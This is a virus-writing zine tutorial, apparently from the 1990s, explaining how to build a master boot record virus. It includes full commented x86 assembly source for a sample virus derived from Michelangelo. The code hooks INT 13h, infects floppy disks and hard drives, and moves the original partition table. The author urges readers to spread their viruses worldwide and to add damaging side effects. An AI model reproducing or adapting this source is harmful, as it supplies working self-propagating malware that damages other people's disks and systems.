SOURCE00.002 - Boot Sector Viruses Explained
Boot Sector Virii Made Easy
by: Havoc The Chaos
Since Dark Angel has made his PHUNKY virus writting guides, but has yet to include boot sector viruses, I decided to take his lead. If you don't know assembly well, or have never written a virus, don't start with boot sector viruses, as you might just confuse yourself. I would suggest taking a serious look at Dark Angel's virus writting guides, as I could not do a better job explaining them. If you already know COM, EXE, SYS, and/or TSR viruses, then welcome to the next step of virus writing.
The basic overview is:
- Load new INT 13h handler into memory.
- Load Partition Table for reading.
- Copy it to high memory and transfer control to there.
- Check to see if the HD is infected, If so, read old partition table and exit.
- If it's clean, then read old boot block.
- Write partition table to sector seven.
- Write virus to sector one.
- Return control to original boot block.
The INT 13h Handler overview is:
- Check for default drive. If so, exit.
- Check to see if it's drive A, if no disk is drive A, then exit.
- Call interrupt 13h.
- Read partition table into boot block, after virus.
- If it's not infected, infect it:
- Write old boot block to head 1, sector 3.
- If it's not a 360k disk, then load Eh into the CL register.
- Load value of CX firstsector.
- Copy partition table to the end of the virus.
- Write the virus to sector one.
Boot sector viruses, like EXE files, start at origin 0. A jump is made to then entrance of the virus, bypassing data, and your interrupt 13 TSR code. First, I shall explain the virus, then give the sample source code to the Sample MBR (Main Boot sectoR) Virus.
Upon entrance, you have to load the virus just below the stack point, at offset:segment 0000:7C00h. You have to xor a register, to clear the Data, and Stack Segments. *NOTE: You can't move segments to each other, so you have to do this via registers. * Xor (eXclusive OR), when called to the same register will clear the register. MOV AX,0 will do the same thing. Before you clear the Stack Segment, ALL interrupts MUST be stopped via the CLI command. After which, you restore them via STI. Before you restore the interrupts, load the stack pointer with the address that you need (7C00h), as the loading point is contained in SS:SP. Then you may want to save 0000:7C00h (Again, you can't push SS/SP up on to the stack, as they ARE the stack).
Next, you have to install the new interrupt 13h code into memory. This will allow the virus to infect the floppy drives. The code that we will use, will overide the current interrupt 13h, but will decrease the memory size by about 2k. There are other ways around this, but alas, this is the code I chose, as I think this is the best way to accomplish this task. After this code is in place, you can simply call INT 13h normally, as INT 13h will check to see if it's called by certain criteria (which will be explained shortly), so just call it like you would any other program.
To check to see if the virus has already infected the hard drive, you just check 'FIRSTSECTOR', a variable I defined which you can change, for the number 7. The designates that the partition table is in sector seven, and that the hard drive has been infected. If not, 'FIRSTSECTOR' will have the value of 3, which means that it is in sector 3, and is a floppy disk.
Now let's assume that you're on a floppy drive. What you to is read the old boot block, and place it into sector 3 on the floppy drive. After which, you will procede to read the boot block on the hard disk. As to why you want to do this, it may be confusing. It is the only way to infect other disks, and get the hard drive infected. Just infecting one floppy disk isn't any big deal, as they will only damage that disk (assuming that you've added code to wreak havoc on their computer - By this time in your virus writting career, you should be an experienced programmer, so I won't get into any coding on damage, or any ideas, because the more original you are, the more popular your virus is.) But if you infect their HD, then any disk that they insert will be infected, and you have more of a chance to spread your virus to all parts of the world. You have to first check to see if it is infected, before you infect it. If your not sure on how to do this, consult the source code, as I commented it so that anyone can understand it. Then after it is infected, return control to the original boot block at s:o 0000:7C00h.
If your already at the HD (FIRSTSECTOR contains a 7), then you have to write the partition table to sector 7, (obviously you always JC to ERROR_ HANDLER if their may be an error), copy the partition table information to the end of the virus (you have to define an area for it, which I called partitioninfo.) Then write it to sector 8, and write the virus to sector 1.
When you originally jumped past some coding, I told you not to worry about it for now. Well, now, that's all that's left to do. First, there are three data definitions, FIRSTSECTOR, the address for the old interrupt 13h, and the destination for the high memory jump. Take a look at the source for more details about it.
Next, we have the interrupt 13h handler. What that should do, in out case, if it's not the default drive, then exit. Then, you have to determine whether or not there's a disk in drive A:. If there is, then infect the disk, if not then exit. Assuming there is a disk in the drive, you should call the old interrupt 13h, then infect the disk. This is called post-execution chaining, as your code executes after the original interrupt is called. Another way that you could do it, is pre-execution chaining. Which would do it's duty first, then call the interrupt.
Next, we need to code the infection area of the interrupt. First, clear out all of the registers, and stacks. Redirect the Data and Extra segment to the code segment, as all the data is in the coding. Read into the boot block after the virus, and continue if there is no error to checking the infection. If there is an error, reset the disk, and try again. If there happen to be alot of errors, then just quit.
After you determine that the disk is not infected, then infect it by the following means (I would suggest using sector 3 for the partition table, but it isn't necessary. If you do change it, however, be sure to change it for the WHOLE virus, otherwise you'll just get alot of errors, as shown :)
- Write the old boot block to head 1, sector 3.
- Determine if it's a 360k disk, if not, move Eh into the CL register.
- Load the value of 3 into firstsector to signify a floppy disk.
- Copy the partition table to the end of the virus, in the des. area.
- Write the virus to sector 1.
After that, restore the registers that you originally pushed onto the stack, and return via 'RETN'. That's it! That's all that there is to infecting boot sectors. After the initial coding is done, you can make your new virus interesting by having some side effects, like displaying a message every so often, or not working on certain days. The quality of your virus is only limited to your imagination! Now, for the source code:
[--- Cut Here -----------------------------------------------------------------]
; The Sample Boot Sector Virus by Havoc The Chaos
; For The SOURCE Issue 00
sample segment byte public
assume cs:sample, ds:sample
org 0
jmp entervirus
highmemjmp db 0F5h, 00h, 80h, 9Fh
firstsector dw 3
oldint13h dd 0C8000256h
int13h: push ds ; Store needed registers
push ax ; " "" "
or dl, dl ; Check for default drive
jnz exitint13h ; If not, check on out
xor ax, ax ; Clear the AX register to ...
mov ds, ax ; ... clear the Data Segment
test byte ptr ds:[43fh], 1 ; Disk for drive A:
jnz exitint13h ; If it's not in, exit
pop ax
pop ds
pushf
call dword ptr cs:[oldint13h] ; Postexecution chaining -
pushf ; Call INT 13h, first,
call infectdisk ; Then infect the disk
popf
retf 2
exitint13h: pop ax ; Jumps to the old INT 13h
pop ds ; Restoring Used Registers
jmp dword ptr cs:[oldint13h]
infectdisk: push ax bx cx dx ds es si di cs
pop ds ; Push all registers on the
push cs ; Stack, and redu the Data &
pop es ; Extra Segments
mov si, 4
readbootblock: mov ax,201h ; Read into the boot block
mov bx,200h ; after virus
mov cx,1
xor dx,dx
pushf
call oldint13h
jnc checkinfect ; continue if no error
xor ax,ax
pushf
call oldint13h ; Reset disk, and read in again
dec si
jnz readbootblock
jmp short quitinfect ; If alot of errors happen, quit
checkinfect: xor si,si
cld
lodsw
cmp ax,[bx] ; Read into boot block, and
jne infectitnow ; if it's not infected, then
lodsw ; infect the fucker
cmp ax,[bx+2]
je quitinfect
infectitnow: mov ax,301h ; Write old boot block
mov dh,1 ; to head 1, sector 3
mov cl,3
cmp byte ptr [bx+15h],0FDh ; is it a 360k disk?
je is360Kdisk ; If it is, then jump
mov cl,0Eh
is360Kdisk: mov firstsector,cx ; load 'firstsector' with
pushf ; the floppy disk check
call oldint13h
jc quitinfect ; exit if there's an error
mov si,200h+offset partitioninfo
mov di,offset partitioninfo ; copy the partition table
mov cx,21h ; info to end of virus
cld ; clear interrupts to work
rep movsw ; with the stack
mov ax,301h ; write virus to sector 1
xor bx,bx
mov cx,1
xor dx,dx
pushf
call oldint13h ; do it!
quitinfect: pop di si es ds dx cx bx ax ; restore registers, and
retn ; return
; End of TSR Code
; Virus starts here:
entervirus: xor ax,ax ; clear the data segment
mov ds,ax
cli ; clear interrupts to work
mov ss,ax ; with the stack
mov ax,7C00h ; Set stack to just below
mov sp,ax ; virus load point
sti
push ds ; save 0:7C00h on stack for
push ax ; later return
mov ax,ds:[13h*4] ; set registers up to put
mov word ptr ds:[7C00h+offset oldint13h],ax
mov ax,ds:[13h*4+2] ; our interrupt 13h in memory
mov word ptr ds:[7C00h+offset oldint13h+2],ax
mov ax,ds:[413h] ; memory size in K
dec ax ; 1024 K
dec ax
mov ds:[413h],ax ; calculate memory now
mov cl,6
shl ax,cl ; ax = paragraphs of memory
mov es,ax
mov word ptr ds:[7C00h+2+offset highmemjmp],ax
mov ax,offset int13h ; set highmemory jump
mov ds:[13h*4],ax ; NOW put our interrupt 13h
mov ds:[13h*4+2],es ; into memory, as part of DOS
; Note: Now we can call interrupt 13h as 'INT 13h', unstead of
; using 'CALL OLDINT13h', as our int13 is in memory
mov cx,offset partitioninfo ; load partition table info
mov si,7C00h
xor di,di
cld
rep movsb ; copy to high memory
; and transfer control there
jmp dword ptr cs:[7C00h+offset highmemjmp]
xor ax,ax ; destination of highmem jmp
mov es,ax
int 13h ; reset disk
push cs
pop ds
mov ax,201h
mov bx,7C00h
mov cx,firstsector ; load into into cx register
cmp cx,7 ; is this to infect the hd?
jne floppyboot ; if not, do the floppies
mov dx,80h ; Read old partition table of
int 13h ; first hard disk to 0:7C00h
jmp short exitvirus ; and exit!
floppyboot: mov cx,firstsector ; read old boot block
mov dx,100h ; to 0:7C00h
int 13h
jc exitvirus ; exit on error
push cs
pop es
mov ax,201h ; read boot block
mov bx,200h ; of first hard disk
mov cx,1
mov dx,80h
int 13h
jc exitvirus ; exit on error
xor si,si
cld
lodsw
cmp ax,[bx] ; is it infected?
jne infectharddisk ; if not, infect hd
lodsw
cmp ax,[bx+2]
jne infectharddisk ; go infect the hd
infectharddisk: mov cx,7 ; Write partition table to
mov firstsector,cx ; sector 7
mov ax,301h
mov dx,80h
int 13h
jc exitvirus ; exit on error
mov si,200h+offset partitioninfo ; Copy partition
mov di,offset partitioninfo ; table information
mov cx,21h
rep movsw
mov ax,301h ; Write to sector 8
xor bx,bx ; Copy virus to sector 1
inc cl
int 13h
exitvirus: retf ; return control to original
; boot block @ 0:7C00h
partitioninfo: db 42h dup (0)
sample ends
end
[--- Cut Here -----------------------------------------------------------------]
So now you have it. You should be able to go and write boot sector viruses, without fucking up THAT much. It does take practice, but practice makes perfect (well, sort of). Go now, you can't just sit here and read everything you find, you have to actually DO it, to become successful. This virus is based on the Michaelangelo virus, with some modifications such as I ripped out the bomb, slightly modified it for the mag, and added comments to it.
- Havoc
